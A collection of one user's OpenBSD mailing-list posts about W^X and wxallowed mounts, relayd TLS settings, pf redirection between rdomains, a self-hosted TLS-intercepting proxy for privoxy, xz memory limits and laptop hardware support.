I have upgraded base system. I am going to update ports when mirror will be in sync with main. wxallowed on /usr works as expected $ mount | grep /usr /dev/sd2e on /usr type ffs (local, noatime, nodev, wxallowed, softdep) $ grep wxallowed /etc/fstab e2687744d2198a2e.e /usr ffs rw,wxallowed,nodev,softdep,noatime 1 2 Besides that I can add that Firefox works with W^X restriction and Chromium does not. wxallowed lets me use Chromium successfully.
/usr/ and wxallowed
Hello,I have non-standard partitioned OpenBSD-current installation dated before 05/27.I don't have separate filesystem/disklabel partition for /usr/local/.I have /usr/ on separate ffs filesystem. Can I add wxallowed to /usr/ filesystem or I must repartition/reinstall OpenBSD?
Breakthrough in distributed rngs
Theoretical breakthrough in distributed random number generation.David Zuckerman, a computer science professor, and Eshan Chattopadhyay, a graduate student, published a paper in March that will be presented in June at the Symposium on Theory of Computing.âWe show that if you have two low-quality random sourcesâlower quality sources are much easier to come byâtwo sources that are independent and have no correlations between them, you can combine them in a way to produce a high-quality random number,âhttps://threatpost.com/academics-make-theoretical-breakthrough-in-r andom-number-generation/118150/http://eccc.hpi-web.de/report/2015/119/
Re: mfs vs tmpfs: advantages and disadvantages
And what about performance? Is tmpfs or mfs faster? Is one or another more resource hungry? -- Furthermore, I consider that systemd must be destroyed Latin oratorical phrase
today amd64 snapshot libpthread segfault
What exactly is version of base system? $ sysctl kern.version Have you also updated packages/ports? On: http://www.openbsd.org/faq/current.html is info about recent ABI break.
Re: Mail : MRA MDA LDA e-mail processors in OpenBSD
>I don't know what "MRA" means, but for fetching: According to Wikipedia's "Email agent" there are: Mail user agent (MUA) Mail submission agent (MSA) Mail access agent (MAA) Mail transfer agent (MTA) Mail delivery agent (MDA) Mail retrieval agent (MRA)
Mail : MRA MDA LDA e-mail processors in OpenBSD
Hello, I am casual OpenBSD user. I use it on laptop. I don't have servers and do *not* want to create my own mail service. I use what crowd uses: I have Yahoo, Gmail, Yandex mail accounts. I would like to use mutt and shell scripts for mail notification etc. To accomplish this I want to have local copy of mail in Maildir format. What MRA do you use for that? Getmail, fetchmail or something else? Is there something in OpenBSD's base for that? I would also like to do some things with mail for example get rid off attachments for mail in one account and do reverse, opposite on the other account: just backup attachments saving them in normal file names with appropriate extensins in file names, not inside other Maildir messages. To accomplish this I think, but I am not sure, I need MDA such as procmail or maildrop or something similar. What do you use? I want something quite secure and not much complicated. It does *not* need to be feature rich. Bonus points for software in OpenBSD's base.
Re: Relayd TLS client mode CA verification
I have reported problem to bugs mailing list. Thanks for checking that and response.
Re: Relayd TLS client mode CA verification
When it works fine, but without certificate verification: $ cat /etc/relayd.conf tcp protocol proto_wp { #tls ca file "/etc/ssl/cert.pem" tls tlsv1.1 pass } relay connect_to_mail_wp { protocol proto_wp listen on 127.0.0.1 port forward with tls to imap.wp.pl port 993 } # relayd -d -vvv -f /etc/relayd.conf startup socket_rlimit: max open files 1024 socket_rlimit: max open files 1024 socket_rlimit: max open files 1024 relay_privinit: adding relay connect_to_mail_wp protocol 1: name proto_wp flags: used, relay flags: tls client tls flags: tlsv1.1, tlsv1.2, cipher-server-preference, client-renegotiation type: tcp pass request ca_engine_init: using RSA privsep engine socket_rlimit: max open files 1024 ca_engine_init: using RSA privsep engine ca_engine_init: using RSA privsep engine ca_engine_init: using RSA privsep engine relay_launch: running relay connect_to_mail_wp relay_launch: running relay connect_to_mail_wp relay_launch: running relay connect_to_mail_wp relay connect_to_mail_wp, tls session 1 connected (1 active) relay connect_to_mail_wp, session 1 (1 active), 0, 127.0.0.1 -> 212.77.101.140:993, done *** When if fails: $ cat /etc/relayd.conf tcp protocol proto_wp { tls ca file "/etc/ssl/cert.pem" tls tlsv1.1 pass } relay connect_to_mail_wp { protocol proto_wp listen on 127.0.0.1 port forward with tls to imap.wp.pl port 993 } # relayd -d -vvv -f /etc/relayd.conf startup socket_rlimit: max open files 1024 relay_load_certfiles: using ca /etc/ssl/cert.pem socket_rlimit: max open files 1024 socket_rlimit: max open files 1024 socket_rlimit: max open files 1024 relay_privinit: adding relay connect_to_mail_wp protocol 1: name proto_wp flags: used, relay flags: tls client tls flags: tlsv1.1, tlsv1.2, cipher-server-preference, client-renegotiation type: tcp pass request ca_engine_init: using RSA privsep engine ca_engine_init: using RSA privsep engine ca_engine_init: using RSA privsep engine ca_engine_init: using RSA privsep engine
Re: Relayd TLS client mode CA verification
Maybe I will post example of what I am doing. OpenBSD-current amd64 March 16th, 2016. Getmail and imap over TLS. $ cat /etc/relayd.conf tcp protocol proto_wp { tls ca file "/etc/ssl/cert.pem" pass } relay connect_to_mail_wp { protocol proto_wp listen on 127.0.0.1 port forward with tls to imap.wp.pl port 993 } $ cat getmailrc [retriever] type = SimpleIMAPRetriever server = 127.0.0.1 port = username = censored password = censored [destination] type = Maildir path = censored [options] delete = false message_log = censored If you do: openssl s_client -connect imap.wp.pl:993 -CAfile /etc/ssl/cert.pem you will see that TLS is supported. I can also confirm that removing line with tls ca file allows me to connect successfully to imap over TLS using relayd. But I want verification of certificate... Does I do something wrong or this is bug in relayd?
Relayd TLS client mode CA verification
Hello, OpenBSD current amd64 march 16 snapshot. I am using relayd as client for encrypted https connections. I would like to make relayd verification of CA. Now I have without verification: web browser encrypted stream -> 1 relayd in server mode -> unencrypted stream -> privoxy and divert using pf -> 2 relayd in client mode -> change destination port using pf -> Internet And it works! I only need to force verification of CA for certificates on 2 relayd, because as far as I understand relayd does not do this by default. Problem is that if I add: tls ca file "/etc/ssl/cert.pem" to http protocol, web browser is not able to reach TLS website. W.B. does not show error, but loads and loads and loads web page, but is not showing webpage.
Why this pf rule is not enough?
I have rdomain 1 and default rdomain pair1 is in rdomain 1 pair2 is in default rdomain Inside rdomain1 there is not loopback interface network is 172.10.0.2/24 In /etc/resolv.conf I have nameserver 127.0.0.1 so all DNS (UDP 53) packets should go to 127.0.0.1 Default route in rdomain1 is pair2 interface (172.10.0.2) I want (and achieved) intercepting DNS requests from rdomain1 to 172.10.0.2 port 9053. I have rule: pass out quick log (all, to pflog0) on pair1 inet proto udp to 127.0.0.1 port 53 rdr-to 172.10.0.2 port 9053 keep state (floating) but it is not enough. I needed to add this rule: pass in quick on pair2 inet proto udp from pair1 to any port 53 rdr-to pair2 port 9053 keep state (floating)
Re: What are the disadvantages of soft updates?
Hello Given that one could change options for filesystem such as sync to async without remounting using mount -u -o options /what /where is this possible to disable softdep on the fly (without unmounting)? Second question: Does mounting fs with softdep *and* sync options is secure? For example now I have: mount | grep usr /dev/sd1e on /usr type ffs (local, nodev, synchronous, softdep) and could have this mount | grep usr /dev/sd1e on /usr type ffs (local, softdep)
Re: Firefox W^X isn't a part of Pwn2Own contest
About X.Org isolation I have heard of Xpra - "screen for X11" but haven't used this yet.
Re: bug in pair ?
What you see in ifconfig? I have line like that: ifconfig pair1 pair1: flags=8843rdomain 1 mtu 1500 and the content of config file for interface: cat /etc/hostname.pair1 inet 172.10.0.1 255.255.255.0 172.10.0.255 rdomain 1 and probably less importantly: sysctl net.inet.ip.forwarding net.inet6.ip6.forwarding
Softraid crypto header key backup
Hello I am using OpenBSD amd64 with FDE. I wonder if there is possibility of making backup of header/key used by softraid crypto like in LUKS/dm-crypt solution for Gnu/Linux? I know that backup is relevant and do backup, but if there is possibility for add one more additional easy step to be more confident with data survival/recovery, I would certainly do this.
Re: Firefox W^X isn't a part of Pwn2Own contest
Do you also sandbox the browser with some sort of remote desktop, or run under a separate X session? AFAIK X allows any program to meddle with any other program under the same display. No, I don't. Setup is easy. In the easiest scenario just create user, add to /etc/sudoers line which lets you run Firefox as another user without need for password, create one line script to use sudo and just refer to that script, if you want to execute Firefox. I think there was also on mailing list posted a small C program to change UID and GID of Firefox process and you also probably can use doas from base, but I still use sudo.
Firefox W^X isn't a part of Pwn2Own contest
Does original Firefox compiled by Mozilla running on Windows have W^X? I bet: no, it doesn't. I run browsers on the other user account in OpenBSD.
Re: Network isolation of process using rdomain rtable
It seems it is starting to work. Server command: /usr/local/bin/sudo -u user /usr/bin/nc -4 -k -l 172.10.0.2 9191 Commands for programs I would like to intercept/redirect: #!/bin/sh /usr/local/bin/sudo /sbin/route -T1 exec /usr/local/bin/sudo \ -u user /usr/bin/nc -4 -n -v 172.10.0.2 9191 random port #!/bin/sh /usr/local/bin/sudo /sbin/route -T1 exec /usr/local/bin/sudo \ -u user /usr/bin/nc -4 -n -v 172.10.0.2 9192 random IP and port (this is Google, don't hack) #!/bin/sh /usr/local/bin/sudo /sbin/route -T1 exec /usr/local/bin/sudo \ -u user /usr/bin/nc -4 -n -v 212.191.227.88 80 #cat pf.conf: pass in quick on pair2 inet proto tcp from pair1 \ rdr-to pair2 port 9191 keep state (floating) pass in pass out #pfctl -sr pass in quick on pair2 inet proto tcp from 172.10.0.1 \ to any flags S/SA tag rdr_tor_tcp rdr-to 172.10.0.2 port 9191 pass in all flags S/SA pass out all flags S/SA Should I also do nat-to (source nat like in nftables) or maybe it is not necessary? Is there any possibility of packet leaks? I mean that this \ pf rules/ruleset will not match some packet and packet \ could go to Internet instead of local socket? I would like to prevent that. I am better with not sending packet anywhere than send to Internet.
Network isolation of process using rdomain rtable
012345678901234567890123456789012345678901234567890123456789 Hello, OpenBSD current amd64 I would like to isolate application from network and also to make sure that every packet goes to certain port at certain IP address. On Linux I achieved that using network namespace, veth, iptables (destination nat) or nftables (dnat and snat). So far I have pair of pair devices: cat /etc/hostname.pair* inet 172.10.0.1 255.255.255.0 172.10.0.255 rdomain 1 \ description "An isolated Ethernet" inet 172.10.0.2 255.255.255.0 172.10.0.255 patched together ifconfig pair1 patch pair2 with default route: route -T1 add default 172.10.0.2 Commands for programs: Server /usr/local/bin/sudo -u user /usr/bin/nc -4 -k -l 172.10.0.2 9191 Commands for programs I would like to intercept/redirect: Client 1 (port is the same): /usr/local/bin/sudo /sbin/route -T1 exec /usr/local/bin/sudo \ -u user /usr/bin/nc -4 -v 172.10.0.2 9191 Client 2 (port must be also redirected): /usr/local/bin/sudo /sbin/route -T1 exec /usr/local/bin/sudo \ -u user /usr/bin/nc -4 -v 172.10.0.2 9192 I struggle with pf rules. Now I have something like that, but probably wrong: pass out quick on pair1 inet proto tcp from 172.10.0.1 \ rdr-to 172.10.0.2 port 9040 keep state (floating) pass out quick on pair1 inet proto udp from 172.10.0.1 \ rdr-to 172.10.0.2 port 9053 keep state (floating) pass in quick log (all, to pflog0) on pair2 inet proto tcp \ to 172.10.0.2 nat-to pair1 pass in quick log (all, to pflog0) on pair2 inet proto udp \ to 172.10.0.2 nat-to pair1 pass in pass out pass out on {pair1,pair2} pass in on {pair1,pair2} I have tried with various other pf rules, rtable option, but none of that had worked. Do I need rdr-to and nat-to (like in nftables) or I just could use rdr-to (like in iptables)? What pf rules should I use?
Ntpd's confusing log messages
012345678901234567890123456789012345678901234567890123456789 It is probably just aesthetics. When I have clock not synchronized and differs a few seconds, I have following output: grep ntpd /var/log/daemon | tail -n 30 Feb 6 17:57:00 host ntpd[7585]: constraint reply from ip: offset 8.928573 Feb 6 17:57:19 host ntpd[7585]: peer 158.75.5.245 now valid Feb 6 17:57:23 host ntpd[7585]: peer 194.29.130.252 now valid Feb 6 17:57:25 host ntpd[7585]: peer 150.254.183.15 now valid Feb 6 17:58:17 host ntpd[9279]: adjusting local clock by 9.096751s Feb 6 18:02:02 host ntpd[9279]: adjusting local clock by 7.971861s Feb 6 18:05:50 host ntpd[9279]: adjusting local clock by 6.838999s Feb 6 18:07:26 host ntpd[9279]: adjusting local clock by 6.363730s Feb 6 18:07:59 host ntpd[9279]: adjusting local clock by 6.196142s Feb 6 18:11:11 host ntpd[9279]: adjusting local clock by 5.246003s Feb 6 18:13:18 host ntpd[9279]: adjusting local clock by 4.615421s Feb 6 18:14:55 host ntpd[9279]: adjusting local clock by 4.133148s Feb 6 18:15:43 host ntpd[7585]: peer 150.254.183.15 now invalid Feb 6 18:15:44 host ntpd[9279]: adjusting local clock by 3.892080s Feb 6 18:20:04 host ntpd[9279]: adjusting local clock by 2.597929s Feb 6 18:21:02 host ntpd[7585]: peer 150.254.183.15 now valid Feb 6 18:24:19 host ntpd[9279]: adjusting local clock by 1.321471s Feb 6 18:24:51 host ntpd[9279]: adjusting local clock by 1.161470s Feb 6 18:29:06 host ntpd[7585]: clock is now synced I don't think that clock is adjusted "by" that values. If that would be the case, I guess clock would be far faster synced.
Re: xz: (stdin): Cannot allocate memory
I figured out that my default is: ulimit -d 1572864 echo "1572864/1024" | bc 1536 Value, which lets me compress using this setting is between 1682864 and 1672864 kilobytes. I have also discovered command line option for xz --memlimit= Now my command looks that: cat archive.tar | xz -zf --memlimit=1600MiB \ --format=xz -9e --threads=2 - > archive.tar.xz but I get: xz: Adjusted the number of threads from 2 to 1 to not exceed the memory usage limit of 1600 MiB 1600 is clearly larger than 674*2=1348 In the end I can compress, but I think that something is wrong. Od: "Christian Weisgerber" <na...@mips.inka.de> Do: "Lampshade" <lampsh...@poczta.fm>; Wysłane: 16:25 Sobota 2016-01-30 Temat: Re: xz: (stdin): Cannot allocate memory > Lampshade: > > > I have following error: > > cat archive.tar | xz -zf --format=xz -9e --threads=2 - > archive.tar.xz > > xz: (stdin): Cannot allocate memory > > You are using the most extreme compression setting, which requires > about 674 MB per thread according to the xz(1) man page. This > causes you to bump against the data size limit (ulimit -d, see > ksh(1)). > > You need to raise the limit or use a less greedy compression setting. > > -- > Christian "naddy" Weisgerber na...@mips.inka.de
Re: xz: (stdin): Cannot allocate memory
This xz command worked in past so I think something must have been changed in past. Indeed, this command worked when I had 4G of DDR3@1333Mhz RAM. Now I have 6GB DDR3 on the same laptop so I have even more. I will look at ulimit -d this evening. I didn't changed them manually, so they must have been changed during upgrade from current to current.
xz: (stdin): Cannot allocate memory
Hello I have this OS with packages as of yesterday (Jan 29): kern.version=OpenBSD 5.9-beta (GENERIC.MP) #1865: Thu Jan 28 20:18:15 MST 2016 dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP and also tested on with packages around Jan 17: kern.version=OpenBSD 5.9-beta (GENERIC.MP) #1846: Sun Jan 17 02:34:54 MST 2016 dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP I have following error: cat archive.tar | xz -zf --format=xz -9e --threads=2 - > archive.tar.xz xz: (stdin): Cannot allocate memory
codepage and iocharset in fat32 aka msdos filesystem
Hello, I am from Poland. I am using Windows 8.1 64-bit and OpenBSD-current amd64. When I used Gnu/Linux I mounted fat32 partitions with these options: iocharset=iso8859-2,codepage=852 However OpenBSD's mount tells me: mount -t msdos -o codepage=852 /dev/sd0f /mnt/partycjaFat/ mount_msdos: -o codepage: option not supported and mount -t msdos -o iocharset=iso8859-2 /dev/sd0f /mnt/partycjaFat/ mount_msdos: -o iocharset: option not supported 1. What codepage is used by default in FAT32 filesystem created and mounted in OpenBSD? 2. Is there a way to use other codepage in OpenBSD? If answer to 2 is no, then: 3. Is there way to force Windows to use different codepage for that FAT32 partition?
Re: Relayd as a HTTPS client
I have posted this message also to bugs mailing lists with subject Relayd in TlsClient mode accepts TLSv1 and TLSv1.1 today, January 10, 2016
Relayd as a HTTPS client
Hi, I am using following configuration to connect to TLS websites: Chromium <-> relayd as a server <-> privo- xy <-> relayd as a client <-> hostile Internet I want to focus on relayd as a client in this mailing list thread. I want to instruct relayd as a client to only connect using TLS versions 1.1 and 1.2 to servers. I don't want TLS version 1.0 and SSL version 3.0. Here is , I hope relevant, part of my config /etc/relayd.conf: http protocol certKlient { tls no cipher-server-preference tls no tlsv1.0 tls tlsv1.1 tls tlsv1.2 tls ca key "/etc/ssl/private/ca.key" password "domek" # i will change that in a future # i don't use that config to my bank account and other relevant websites tls ca cert "/etc/ssl/ca.crt" tls ciphers "HIGH:!aNULL:!eNULL:!SSLv3:!TLSv1:!DSS:!ECDSA:!RSA:!SHA1:-ECDH:ECDHE:+SHA384:+SHA256" pass } relay SendReencryptNormal { listen on 127.0.0.1 port 7443 protocol certKlient forward with tls to destination } The problem is that I can type into terminal something like: openssl s_server -key key.pem -cert cert.pem -accept 44330 -www -no_ssl3 -no_tls1_1 -no_tls1_2 or openssl s_server -key key.pem -cert cert.pem -accept 44330 -www -tls1 and tell Chromium to go to: https://127.0.0.1:44330/ and it will connect using TLS version 1.0. New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES256-SHA SSL-Session: Protocol : TLSv1 Cipher: ECDHE-RSA-AES256-SHA Session-ID: Session-ID-ctx: 0100 Master-Key: EC6722729D895BEBEDAEDF1964920A6EDEC11674F5FC7F213C1449AE1CA19C393AD9952FBC7B8023ECD7767D72B47D9B Start Time: 1452113060 Timeout : 300 (sec) Verify return code: 0 (ok) I can also go to: https://www.ssllabs.com/ssltest/viewMyClient.html and this website also tells me, that I can be connected using TLS version 1.0. So this is my main problem: I don't want to connect using TLS version 1.0. What should I add to /etc/relayd.conf to prevent that?
Re: Failed to boot after upgrading to Dec. 23 snapshot
Similar problem: Upgrade history: Dec 18 2015 - ok Dec 19 2015 - ok Dec 23 2015 - can not boot after that partial outputs from commands: disklabel sd0 size offset fstype a: 146805807 829967361 RAID other not related to OpenBSD disklabel sd1 size offsetfstypefsize bsize cpg a: 8388608 64 4.2BSD 2048 16384 1 c: 146805279 0 unused other related, but I don't think they are useful for this If I am wrong ask for more information. bioctl softraid0 Volume Status Size Device softraid0 0 Online 75164302848 sd1 CRYPTO 0 Online 75164302848 0:0.0 noencl sd0a machine diskinfo DISK BIOS Type Cyls Heads hd00x80 label 1023 255 Secs Flags Checksum 63 0x2 0xac69cac8 I am using FDE for OpenBSD current. I have upgraded as usual for me from external separate installation media. I have, as always, used bioctl to manually provision encrypted partition. bioctl -c C -l /dev/sd0a softraid0 then I run upgrade. I must admit that when I normally use OpenBSD then provisioned disc is called sd1, and when I upgrade then provisioned disc is sd2, but that never caused a problem. I have also another warning, which I usually see but never caused a problem, too. Making all device nodes… done installboot: /mnt/usr/mdec/biosboot extends beyond sector 268435455. OpenBSD might not boot. Multiprocessor machine; using bsd.mp instead of bsd. Congratulations! something >From bootloader I got: Loading ….. probing: pc0 mem[something] disk: hd0+ sr0* >> OpenBSD/amd64 BOOT 3.29 Passphrase: open (sr0a:/etc/boot.conf): can't read disk label boot> cannot open sr0a:/etc/random.seed: can't read disk label booting sr0a:/bsd:open sr0a:/bsd: can't read disk label
Re: Failed to boot after upgrading to Dec. 23 snapshot
Topic should go to tech.. and is actually solved.
Browsers in OpenBSD with W^X support
Hello, I would like to know if there are others browsers using W^X except Firefox, which I know to have this enabled. I am especially interested in Chromium package.
Mono and GTK on OpenBSD
Hello, I would like to learn programming in C# using Mono on OpenBSD. Is it possible to easily use GtkSharp GTK# to prepare environment to create Hello World program using GTK?
Re: I have problem compiling libgdamm
It was the root cause of problem. When I downloaded release tarball instead of something from git.gnome.org it compiled successfully. Thanks for help. Od: "Callum Davies" <calrog...@gmail.com> Do: "Lampshade" <lampsh...@poczta.fm>; Wysłane: 17:31 Niedziela 2015-12-06 Temat: Re: I have problem compiling libgdamm > I'm running current amd64. There's no need to run autogen.sh if you > are using a release tarball of libgdamm.
I have problem compiling libgdamm
Hello, I want to compile libgdamm from source. I have tried with 3 releases and I have the same error after I type: gmake. libgdamm have been extracted to: /home/open/kompilacje/libgdamm/kod/ gmake[1]: Entering directory '/home/open/kompilacje/libgdamm/kod/libgdamm-4.99.8/libgda/src' /usr/bin/perl -I"/usr/local/lib/glibmm-2.4/proc/pm" -- "/usr/local/lib/glibmm-2.4/proc/gmmproc" -I ../../tools/m4 --defs . config . ../libgdamm Documentation: Class/Namespace for gda_dsn_split not found Documentation: Transformed C name gda_dsn_split into C++ name gda_dsn_split No initialization for type get4 from type GdaConfig* defined (line: get8, output param: get3, c return: gda_config_get`'()) m4 failed with exit code 1. Aborting... What can I do to successfully compile this library?
Re: Is it possible to use pledge(2) to make something similar to firejail?
Thanks for answers. @dan mclaughlin. But how to prevent attacker going out of chroot? Do you think that this is possible to prevent this using pledge(2)? Thanks for links. Especially Jonathan's "Re: making firefox less insecure" mail dated 2014-11-23 is worth reading for me. I wonder if pledge(2), in theory, can be used to extend his program.
Is it possible to use pledge(2) to make something similar to firejail?
Is it possible, in theory, to use pledge(2) to make something similar to firejail? https://packages.debian.org/sid/main/firejail Firejail is a Gnu/Linux's program which executes Firefox as it's descendant with reduced privilages. For example I would like to restrict Firefox to not write and read to directory outside /home/firefox directory. Let's assume that I run firefox as another user than my normal account. I would restrict, using traditional Unix privilages, Firefox and all its descendants, logging as another user to regain privilages to for example to /home/open. I imagine that would still leave huge attack vector to pown system and/or sniff password, but I think it is better than nothing.
Re: pf change destination port for outgoing traffic
match out on bge0 inet proto tcp to any port 80 user "_relayd" tag przekierujNaPort443 pass out quick log (all, to pflog0) inet proto tcp tagged przekierujNaPort443 rdr-to 0.0.0.0/0 port 443 bitmask Indeed it works. Thank you very much.
Re: pf change destination port for outgoing traffic
Does anything changed during these years? I would like to do the same thing the author of topic wanted. I want it because I am playing with relayd, privoxy and pf. I have done chain Firefox -> relayd1-> privoxy -> relayd2, but relayd2 seems to try estabilish tls connection to 80 port rather than 443 after line "forward with tls to destination" - if I debug problem correctly . This topic about chain is connected with "Re: TLS intercepting proxy [MitM]".
Re: TLS intercepting proxy [MitM]
Thanks Uwe Werler! I have not yet estabilished chain described in first message, but it is due to lack of time I didn't tried. Firefox runs as firefox user. I have actually MitM on relayd *using divert* with this pf-magic: cat /etc/pf_kop.conf ext_if="bge0" int_if="lo0" set state-policy floating pass out quick log on $ext_if inet proto tcp to any port 443 user firefox route-to lo0 pass in quick log on lo0 inet proto tcp to any port 443 divert-to 127.0.0.1 port 8443 pass in pass out Thanks for all, especially Uwe Werler! I am going to try make chain described in first message in day or two.
Re: TLS intercepting proxy [MitM]
Ok, I know that relayd can decrypt traffic, then log, then encrypt. The thing is that I want to send decrypted traffic to another process (privoxy), and then re-encrypt it. I have also problem with Reyk's config because I can not divert outgoing traffic using pf. I have tried with rdr-to and nat-to, but it removes destination IP address in packets. I want to intercept and alter traffic on the same box that I run Firefox. Is this possible using pf and relayd or I must use something else?
TLS intercepting proxy [MitM]
Hello, I would like to use privoxy to scrub/delete some informations in application layer (HTTP) going out from my PC. Problem is that a lot of connections are secured with TLS, so privoxy can not filter them. Is there any way to do something like that: Firefox -> decrypt [MitM] -> privoxy -> encrypt securely -(NIC)-> Internet? It is my PC, so I can install new certificate or something like that, but neverthless I don't know how to achieve that result. Is this possible using relayd? Is it possible with other tool in ports or something that I can compile from source?
Changing directory for fetching source code
Hi, I would like sometimes experiment with some options/custom config in kernel. On the other hand that is not supported by OpenBSD. Suppose I need to reproduce problem with original kernel. I think good solution for me would be to have two directories for OpenBSD's code. Instead of /usr/src/sys/ I would have: 1. /usr/original/src/sys/ 2. /usr/modified/src/sys/ Quesion: Does changing the path to source code directory is supported by OpenBSD? I mean this as the only one change to build process covered by FAQ. No other changes are going to be made.
Rust programming language
Hello May 15 2015 have been a release date for Rust 1.0. What is your opinion on Rust? Does it have any chances to be some day popular programming language? Do you think that learning Rust can be good for educational purposes?
Software for time management calendar
What software you use for this purposes?
Re: Raspberry Pi 2 Model B
Hello I haven't know that Raspberry Pi is so closed that it requires closed source blob to even boot. Thanks for responses. I am not going to buy Raspberry Pi 2 any more (or at least when blob will be open source). Have a good day.
Raspberry Pi 2 Model B
Hi New version of Raspberry Pi is announced. Its SoC have four cores in Cortex-A7 microarchitecture so it is compatible with ARMv7. It also have 1 GB of RAM. Have the same GPU as its predecessor: VideoCore IV 3d. For some time GPU have open documentation and open (BSD licence) driver in Linux world. Price is still $35. It should be electrically compatible with predecessor and have the same dimensions. Are you going to support this hardware in OpenBSD?
Does the OpenBSD support well AMD's APU hardware?
Hello, I am a student from Poland (country in Central Europe) and I would love to use OpenBSD everyday. I must have Windows operating system too. I must have it because of Autodesk's Inventor and Autocad software (in future probably also SolidWorks) and Ansys and so on. For that software I need something more powerful than Intel's GPU (not only for performance but also for quality). Today I have laptop with Optimus (Intel's GPU + Nvidia's GPU, if Nvidia's GPU renders something, Intel's GPU is proxy). It works well under Windows. Under Linux Intel's GPU works well, Nvidia's GPU is by default powered off. I can use it by manually typed commands. I can not do anything in BIOS to turn off Nvidia's GPU. OpenBSD can not turn off my Nvidia's GPU (despite the fact that it not renders or passes by anything) and just consumes a lot of energy from battery and heats my laptop. So I would consider buying a new laptop with AMD APU if it is supported well by OpenBSD and not heats laptop to high temperatures. Does anybody have experience with AMD APU's on OpenBSD and can let me know if it performs well? I know for a lot of you buying laptop is relatively more affordable. Please consider that in Poland we have the same (or even a bit higher) prices of electronics and considerably lower earnings, so I don't want to make a mistake and buy hardware based on my wrong opinion about support of AMD's GPUs with OpenBSD. I don't posted this topic in „General Hardware” because I am particularly interested in OpenBSD support, but if you consider it should land there please place this topic there. With best regards
Does the OpenBSD support well AMD's APU hardware?
Hello, I am a student from Poland (country in Central Europe) and I would love to use OpenBSD everyday. I must have Windows operating system too. I must have it because of Autodesk's Inventor and Autocad software (in future probably also SolidWorks) and Ansys and so on. For that software I need something more powerful than Intel's GPU (not only for performance but also for quality). Today I have laptop with Optimus (Intel's GPU + Nvidia's GPU, if Nvidia's GPU renders something, Intel's GPU is proxy). It works well under Windows. Under Linux Intel's GPU works well, Nvidia's GPU is by default powered off. I can use it by manually typed commands. I can not do anything in BIOS to turn off Nvidia's GPU. OpenBSD can not turn off my Nvidia's GPU (despite the fact that it not renders or passes by anything) and just consumes a lot of energy from battery and heats my laptop. So I would consider buying a new laptop with AMD APU if it is supported well by OpenBSD and not heats laptop to high temperatures. Does anybody have experience with AMD APU's on OpenBSD and can let me know if it performs well? I know for a lot of you buying laptop is relatively more affordable. Please consider that in Poland we have the same (or even a bit higher) prices of electronics and considerably lower earnings, so I don't want to make a mistake and buy hardware based on my wrong opinion about support of AMD's GPUs with OpenBSD. I don't posted this topic in „General Hardware” because I am particularly interested in OpenBSD support, but if you consider it should land there please place this topic there. With best regards
Is there any chance to implement switch to turn off for example PCI-Express devices?
Hello I have in laptop many devices that I don't use. For example DVD writer. But my greates problem is the unability to turn off under OpenBSD Nvidia GPU. Unfortunately I have Optimus laptop, so I don't have normal, independent hardware multiplexer. I have Intel and Nvidia GPUs, and Intel GPU is proxy for Nvidia GPU. I don't use Nvidia GPU under Linux and it is fine. However under OpenBSD I even can't turn off Nvidia GPU despite that GPU is not usable due to lack of drivers in OpenBSD for this GPU. Intel GPU is fine for me for Linux and OpenBSD tasks (I use Nvidia GPU for Autodesk Inventor in Windows). But Nvidia GPU is heating my laptop despite it isn't used by OpenBSD. It is significant change in temperature, under Linux and Windows (lightweight tasks) I have about 42 Celsius degrees (°C) and under OpenBSD default configuration when it is idle it is 67 Celsius degrees (°C), when I switched frequency of CPU to lowest possible by apmd it is still about 63 Celsius degrees (°C).! I think this can reduce lifetime of my laptop. I think that in OpenBSD there is currently no way to disable particular device, but as I understand PCI-Express has power-management capabilities and can turn off device. Is there any chance that in future version of OpenBSD will be implemented switch to turn off particular device by advanced users via sysctl or I don't know, /dev directory? Something like bbswitch under Linux. In any case there is output of my dmesg: http://daemonforums.org/showpost.php?p=50519postcount=98